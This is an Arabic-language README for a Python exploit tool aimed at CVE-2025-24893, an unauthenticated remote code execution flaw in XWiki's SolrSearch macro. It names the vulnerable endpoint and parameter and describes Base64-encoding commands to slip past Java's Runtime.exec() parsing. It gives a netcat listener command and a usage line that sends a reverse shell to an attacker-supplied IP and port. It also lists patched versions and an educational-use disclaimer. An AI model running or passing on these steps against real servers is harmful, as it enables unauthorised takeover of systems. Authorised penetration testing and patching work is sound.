
استغلال تنفيذ الكود عن بُعد (RCE) في XWiki
استغلال تنفيذ الكود عن بُعد (RCE) في XWiki
أداة استغلال بلغة Python3 للثغرة CVE-2025-24893، وهي ثغرة حرجة لتنفيذ الكود عن بُعد غير مصادق عليه (RCE) تؤثر على منصة XWiki.
يستغل هذا السكريبت ثغرة إدخال كود/تعبير (CWE-95) داخل مكون الماكرو SolrSearch. تسمح الثغرة للمهاجمين بتنفيذ كود Groovy/Java عشوائي على نظام التشغيل الأساسي. يقوم الأداة تلقائيًا بترميز Base64 لتجاوز قيود تفسير الأوامر لوظيفة Runtime.getRuntime().exec() في Java.
/bin/get/Main/SolrSearch (عبر الوسيط text)nc -lvnp 4444
python3 CVE-2025-24-893.py <الهدف_URL> <عنوان_IP_الشبكة_الخاصة> <المنفذ>
مثال:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsلتثبيت التبعية المطلوبة:
pip install requests
قم بتحديث نسخة XWiki الخاصة بك إلى إحدى الإصدارات الرسمية المُصحَّحة: 15.10.11، 16.4.1، 16.5.0-rc-1 (أو أحدث).
تم تطوير هذا السكريبت للأغراض التعليمية فقط، ولتدقيقات الأمان المصرح بها، واختبارات الاختراق (Pentest). لا يتحمل المؤلف أي مسؤولية عن أي استخدام غير مناسب، أو أضرار، أو أنشطة غير قانونية ناتجة عن استخدام هذه الأداة. استخدام هذا السكريبت ضد أهداف دون إذن مسبق يعتبر غير قانوني تمامًا.